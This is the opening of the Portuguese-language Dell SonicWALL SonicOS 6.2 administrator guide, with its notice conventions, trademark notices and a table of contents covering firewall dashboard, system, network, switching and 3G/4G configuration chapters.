Sonicos 6.2 Admin Guide (Brazil) PDF

Guia do Administrador do
SonicOS 6.2
| 1
Observaes, Cuidados e Avisos
OBSERVAO: indica informaes importantes que ajudam voc a utilizar melhor seu
sistema.
CUIDADO: indica risco de dano ao hardware ou perda de dados se as instrues no forem

seguidas.
AVISO: indica risco de dano a propriedades, ferimentos ou morte.
2014 Dell Inc.

Marcas comerciais: Dell, o logotipo da DELL, SonicWALL e todos os outros nomes de produtos e
servios da SonicWALL e slogans so marcas comerciais da Dell Inc.
Microsoft Windows 7, Windows Server 2010, Internet Explorer e Active Directory so marcas comerciais ou
registradas da Microsoft Corporation.
eDirectory e NetWare so marcas registradas da Novell, Inc.
Adobe, Acrobat e Acrobat Reader so marcas comerciais ou marcas comerciais registradas da Adobe
Systems Incorporated nos EUA e/ou em outros pases.
Outros nomes de produtos e empresas aqui mencionados podem ser marcas comerciais e/ou marcas
comerciais registradas de suas respectivas empresas e so de propriedade exclusiva dos respectivos
fabricantes.
2014 10 P/N 232-002597-00_Rev A
2 | Guia do Administrador do SonicOS 6.2

Sumrio
Parte 1. Introduo
Prefcio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Aviso de direitos autorais . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Garantia limitada . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Sobre este guia . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
Organizao deste guia . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
Convenes do guia . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
Suporte tcnico da Dell SonicWALL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
Mais informaes sobre os produtos Dell SonicWALL . . . . . . . . . . . . . . . . . . . . 36
Documentao atual . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
Captulo 1. Introduo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
Introduo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
Registrando o dispositivo de segurana da Dell SonicWALL . . . . . . . . . . . . . . . 37
Interface de gerenciamento . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
Parte 2. Painel
Captulo 2. Usando o Painel de visualizao do SonicOS . . . . . . . . . . . . . . . . . . . . 49
Painel de visualizao. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
Painel > Monitor multi-core . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
Habilitando o monitor em tempo real e coleta de AppFlow. . . . . . . . . . . . . . . . . 50
Painel > Monitor em tempo real . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
Usando a barra de ferramentas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
Monitor de aplicativos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
Fluxo de largura de banda de ingresso e de egresso. . . . . . . . . . . . . . . . . . . . . 58
Monitor de taxa de pacote. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
Monitor de tamanho de pacotes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
Monitor de contagem de conexes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
Fluxo de monitor de vrios ncleos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
Monitor em tempo real do IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
Painel > Trao AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
Painel > Monitor AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
Opes de filtro . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
Sumrio | 3
Guias Monitor AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
Barra de ferramentas de Monitor AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
Opes de grupo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
Status do Monitor AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68
Exibies de Monitor AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69
Usando opes de filtragem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
Gerando relatrio de visualizao de aplicativo . . . . . . . . . . . . . . . . . . . . . . . . . 72
Monitor do IPv6 no App Flow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
Painel > Relatrios AppFlow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75
Baixando assinaturas de servios de segurana da Dell SonicWALL . . . . . . . . 76
Exibindo relatrios AppFlow desde o momento do reincio. . . . . . . . . . . . . . . . . 76
Exibindo relatrios AppFlow desde o momento da ltima redefinio . . . . . . . . 76
Exibindo relatrios AppFlow na programao. . . . . . . . . . . . . . . . . . . . . . . . . . . 76
Painel > Relatrios de ameaas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78
Viso geral de relatrios de ameaas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78
Tarefas de configurao dos relatrios de ameaas. . . . . . . . . . . . . . . . . . . . . . 80
Painel > Monitor de usurio. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
Painel > Monitor BWM. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
Painel > Monitor de conexes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82
Exibindo conexes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
Filtrando conexes exibidas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
Monitor de conexes do IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
Painel > Monitor de pacotes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
Usando o monitor de pacotes e o espelho de pacotes . . . . . . . . . . . . . . . . . . . 84
Painel > Monitor de log . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89
Parte 3. Sistema
Captulo 3. Exibindo informaes de status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
Sistema > Status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
Mensagens do sistema . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
Informaes do sistema . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
ltimos alertas. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Servios de segurana . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Interfaces de rede . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96
Captulo 4. Gerenciando licenas da Dell SonicWALL . . . . . . . . . . . . . . . . . . . . . . . 97
Sistema > Licenas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
Status da licena de ns . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98
Resumo dos servios de segurana . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98
Gerenciar servios de segurana online . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
Atualizao manual . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
Atualizao manual para ambientes fechados . . . . . . . . . . . . . . . . . . . . . . . . . 100

Captulo 5. Definindo as configuraes de administrao . . . . . . . . . . . . . . . . . . 103
Sistema > Administrao. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
Nome do firewall . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104
Nome e senha do administrador . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104
Configuraes de segurana de login . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105
Vrios administradores . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
Configuraes de Gerenciamento da Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107
Verificao de certificado de cliente com carto de acesso comum . . . . . . . . . 108
Configuraes de gerenciamento SSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
Gerenciamento avanado . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
URL de download . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
Seleo de idioma a UI: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
Captulo 6. Gerenciando Certificados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
Sistema > Certificados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
Viso geral de certificados digitais . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
Certificados e solicitaes de certificados. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
Detalhes do certificado . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119
Importando certificados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119
Excluindo um certificado . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121
Gerando uma solicitao de assinatura de certificado . . . . . . . . . . . . . . . . . . . 121
Configurando o protocolo de registro de certificado simples. . . . . . . . . . . . . . . 123
Criptografia do Suite B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124
Captulo 7. Configurando definies de Hora . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
Sistema > Hora . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
Hora do sistema . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Configuraes de NTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Captulo 8. Definindo programaes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
Sistema > Programaes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
Adicionando uma programao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
Excluindo Programaes. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
Captulo 9. Gerenciando firmware de dispositivo de segurana da
Dell SonicWALL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
Sistema > Configuraes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
Configuraes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 134
Gerenciamento de firmware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
Atualizao automtica do firmware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137
FIPS. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137
NDPP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138
Captulo 10. Usando o Monitor de pacotes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 141
Sistema > Monitor de pacotes. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 141
Viso geral do Monitor de pacotes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 141
| 5
Configurando o Monitor de pacotes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Verificando as atividades do Monitor de pacotes . . . . . . . . . . . . . . . . . . . . . . . 155
Informaes relacionadas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
Captulo 11. Usando ferramentas de diagnstico . . . . . . . . . . . . . . . . . . . . . . . . . 163
Sistema > Diagnsticos. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163
Relatrio do suporte tcnico . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164
Ferramentas de diagnstico . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 165
Verificar configuraes de rede. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166
Monitor de conexes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 167
Monitor multi-core . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
Monitor central. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170
Monitor de link . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
Monitor de tamanho de pacotes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
Pesquisa de nome DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
Pesquisa de nome DNS do IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
Encontrar caminho de rede . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
Ping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 174
Monitor do processo do ncleo 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
Pesquisa de lista negra em tempo real . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
Resoluo de nome reversa . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
Resoluo de nome reverso do IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
Limite de conexo TopX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
Verificar a pesquisa de servidor de BOTNET e localizao geogrfica . . . . . . 177
Pesquisa de MX e verificao de faixa . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
Rota de rastreamento . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Monitor de servidor web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
Monitor de usurios . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
Sistema > Reiniciar . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 181
Parte 4. Rede
Captulo 12. Configurar interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
Rede > Interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185
Configuraes de interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
Estatsticas de trfego de interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
Interfaces fsicas e virtuais . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 187
Objetos seguros do SonicOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
Modo transparente . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
Modo de sniffer IPS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
Configurar interfaces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
Configurar o modo de sniffer IPS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Configurar o modo de cabo e de tap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214
Modo de cabo com agregao de links. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217

Modo de ponte de camada 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219
Configurar modo de ponte de camada 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 240
Configurando interfaces para o IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249
Captulo 13. Configurando Interfaces do PortShield . . . . . . . . . . . . . . . . . . . . . . . 251
Rede > Grupos do PortShield . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 251
Modo esttico e Modo transparente . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 252
Configurando grupos do PortShield . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253
Captulo 14. Configurar failover e balanceamento de carga . . . . . . . . . . . . . . . . . 255
Rede > Failover e balanceamento de carga . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
Failover e Balanceamento de carga . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
Estatsticas de balanceamento de carga. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259
Vrias WAN (MWAN) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259
Captulo 15. Configurar zonas de rede . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 263
Rede > Zonas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 263
Como funcionam as zonas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 264
Zonas predefinidas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 265
Tipos de segurana . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 265
Permitir confiana de interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 266
Habilitar servios de segurana SonicWALL em zonas . . . . . . . . . . . . . . . . . . 266
A tabela de configuraes de zona . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
Adicionar uma nova zona . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 268
Excluir uma zona . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 269
Configurar uma zona para acesso de convidado . . . . . . . . . . . . . . . . . . . . . . . 269
Configurar a zona de WLAN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 271
Captulo 16. Definir configuraes de DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 273
Rede > DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 273
DNS e IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
Preveno contra ataque de religao de DNS . . . . . . . . . . . . . . . . . . . . . . . . 274
Captulo 17. Configurar objetos de endereos. . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Rede > Objetos de endereos. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Tipos de objetos de endereos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Grupos de objetos de endereos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 276
Criar e gerenciar objetos de endereos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 277
Grupos e objetos de endereos padro . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278
Adicionar um objeto de endereo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278
Editar ou excluir um objeto de endereo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280
Criar objetos de endereos de grupo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280
Trabalhar com endereos dinmicos . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 281
Objetos de endereos e IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
Captulo 18. Configurar grupos de servios e objetos de servios de rede . . . . . 293
Rede > Servios . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 293
| 7
Viso geral de servios padro . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294
Lista de tarefas de configurao de servios personalizados . . . . . . . . . . . . . . 294
Captulo 19. Configurar anncios de rota e polticas de rota . . . . . . . . . . . . . . . . 301
Rede > Roteamento . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 301
Anncio de rota . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 302
Polticas de rota. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 304
Servios de roteamento avanado OSPF e RIP . . . . . . . . . . . . . . . . . . . . . . . . 309
Configurando os servios de roteamento avanado de RIP e OSPF . . . . . . . . 312
Configurar roteamento avanado do BGP . . . . . . . . . . . . . . . . . . . . . . . . . . . . 320
Roteamento com base em poltica e no IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . 321
Captulo 20. Configurar polticas de NAT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 323
Rede > Polticas de NAT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 323
Polticas de NAT e IPv6. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 324
Tabela de polticas de NAT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325
Configuraes da poltica de NAT explicadas. . . . . . . . . . . . . . . . . . . . . . . . . . 326
Viso geral do balanceamento de carga de NAT . . . . . . . . . . . . . . . . . . . . . . . 328
Criar polticas de NAT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
Usar balanceamento de carga de NAT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340
Captulo 21. Gerenciar trfego de ARP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
Rede > ARP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
Entradas ARP estticas. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 344
Sub-redes secundrias com ARP esttico . . . . . . . . . . . . . . . . . . . . . . . . . . . . 344
Navegar e classificar a tabela de cache de ARP . . . . . . . . . . . . . . . . . . . . . . . 346
Navegar e classificar entradas da tabela de cache de ARP . . . . . . . . . . . . . . . 346
Liberar o cache de ARP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346
Captulo 22. Configurando o Protocolo de Descoberta do Vizinho . . . . . . . . . . . . 347
Rede > Descoberta do vizinho (Somente IPv6) . . . . . . . . . . . . . . . . . . . . . . . . . . . 347
Captulo 23. Configurar antifalsificao de MAC-IP . . . . . . . . . . . . . . . . . . . . . . . . 349
Rede > Antifalsificao de MAC-IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 349
Viso geral da proteo de antifalsificao de MAC-IP . . . . . . . . . . . . . . . . . . 349
Configurar a proteo de antifalsificao de MAC-IP . . . . . . . . . . . . . . . . . . . . 350
Captulo 24. Configurar o servidor DHCP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355
Rede > Servidor DHCP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355
Viso geral das opes do servidor DHCP . . . . . . . . . . . . . . . . . . . . . . . . . . . . 357
Vrios escopos DHCP por interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 357
Configurar o servidor DHCP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359
Escopos de concesso de servidor DHCP . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361
Concesses de DHCP atuais . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361
Configurar opes avanadas do servidor DHCP. . . . . . . . . . . . . . . . . . . . . . . 361
Configurar o servidor DHCP para intervalos dinmicos . . . . . . . . . . . . . . . . . . 366
Configurar entradas de DHCP estticas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370

Configurar opes genricas do DHCP para escopos de
concesso de DHCP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 373
Nmeros de opes do DHCP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 374
DHCP e IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 382
Captulo 25. Usar Auxiliar de IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 383
Rede > Auxiliar de IP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 383
Definir configuraes do auxiliar de IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 384
Configurar protocolos de retransmisso . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 384
Configurar polticas do auxiliar de IP. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385
Captulo 26. Configurar encaminhamento de proxy da Web . . . . . . . . . . . . . . . . . 389
Rede > Proxy da Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389
Configurar o encaminhamento de proxy automtico (somente Web) . . . . . . . . 390
Configurar servidores proxy de usurio. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
Captulo 27. Configurar o DNS dinmico . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 393
Rede > DNS dinmico. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 393
Provedores de DDNS suportados . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 394
Configurar o DNS dinmico. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 394
Tabela de configuraes de DNS dinmico . . . . . . . . . . . . . . . . . . . . . . . . . . . 397
Captulo 28. Configurar o monitoramento de rede . . . . . . . . . . . . . . . . . . . . . . . . . 399
Rede > Monitoramento de rede. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399
Adicionar uma nova poltica de monitoramento de rede . . . . . . . . . . . . . . . . . . 400
Configurar o roteamento baseado em poltica habilitado por investigao. . . . 402
Parte 5. Comutao
Captulo 29. Configurando a Comutao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
Comutao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
Viso geral da Comutao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
O que a Comutao? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
Vantagens da comutao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 406
Como funciona a comutao?. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
Configurando a Comutao . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408
Configurando o Truncamento de VLAN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408
Configurando a Descoberta da Camada 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . 411
Configurando a Agregao de links . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
Configurando o Espelhamento de portas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 414
Glossrio . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
Parte 6. 3G/4G/Modem
Captulo 30. Seleo 3G/4G/Modem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 419
3G/4G/Modem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 419
Selecionar o status 3G/4G/Modem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 420
| 9
Captulo 31. Configurar 3G/4G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 421
3G/4G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 421
Viso geral de 3G/4G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 421
3G/4G > Status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 427
